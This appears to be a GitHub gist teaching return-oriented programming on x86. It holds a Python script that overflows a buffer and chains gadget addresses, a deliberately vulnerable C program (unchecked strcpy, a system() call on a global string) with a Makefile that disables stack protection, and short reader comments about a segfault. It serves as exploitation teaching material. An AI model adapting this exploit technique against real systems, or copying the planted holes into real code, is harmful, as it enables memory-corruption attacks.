Simple ROP Exploit Example (x86)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # NOTE: For Python 2.7 | |
| import os | |
| import struct | |
| #Find gadgets | |
| pop_ret = 0x08049ca5 # start address of a pop,ret sequence | |
| pop_pop_ret = 0x08049ca4 # start address of a pop,pop,ret sequence | |
| lazy = 0x08049b05 # objdump -d | grep lazy | |
| food = 0x08049b30 # objdump -d | grep food | |
| feeling_sick = 0x08049b92 # objdump -d | grep feeling_sick | |
| #Buffer Overflow | |
| payload = "A"*0x6c | |
| payload += "BBBB" | |
| #food(0xdeadbeef) gadget | |
| payload += struct.pack("I", food) | |
| payload += struct.pack("I", pop_ret) | |
| payload += struct.pack("I", 0xdeadbeef) | |
| #feeling_sick(0xd15ea5e, 0x0badf00d) gadget | |
| payload += struct.pack("I", feeling_sick) | |
| payload += struct.pack("I", pop_pop_ret) | |
| payload += struct.pack("I", 0xd15ea5e) | |
| payload += struct.pack("I", 0x0badf00d) | |
| payload += struct.pack("I", lazy) | |
| os.system("./simple-rop \"%s\"" % payload) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| simple-rop: simple-rop.c | |
| gcc -m32 -O0 -g -static -fno-stack-protector $^ -o $@ | |
| .PHONY: clean | |
| clean: | |
| rm -rf simple-rop |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <string.h> | |
| #include <stdlib.h> | |
| char string[100]; | |
| // I might need this later. ¯\_(ツ)_/¯ | |
| // I'm not using it so it shouldn't affect anything. | |
| void lazy() { | |
| system(string); | |
| } | |
| void food(int magic) { | |
| printf("THANK YOU!\n"); | |
| if (magic == 0xdeadbeef) { | |
| strcat(string, "/bin"); | |
| } | |
| } | |
| void feeling_sick(int magic1, int magic2) { | |
| printf("1m f33ling s1cK...\n"); | |
| if (magic1 == 0xd15ea5e && magic2 == 0x0badf00d) { | |
| strcat(string, "/echo 'This message will self destruct in 30 seconds...BOOM!'"); | |
| } | |
| } | |
| void vuln(char *string) { | |
| char buffer[100] = {0}; | |
| strcpy(buffer, string); // I don't know any better. | |
| } | |
| int main(int argc, char** argv) { | |
| string[0] = 0; | |
| printf("m3 hUN6rY...cAn 1 haZ 5H3ll?! f33d mE s0m3 beef\n\n"); | |
| if (argc > 1) { | |
| vuln(argv[1]); | |
| } else { | |
| printf("y0u f0rG0T t0 f33d mE!!!\n"); | |
| } | |
| return 0; | |
| } |
You'll probably have to change the hardcoded addresses of the gadgets.
Should I just set pop_ret to the start of the overflow? like the first appearence of "BBBB" or after it
You should set pop_ret to the address of the sequence in the program.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
it created a segmenttion fault. what i have to change?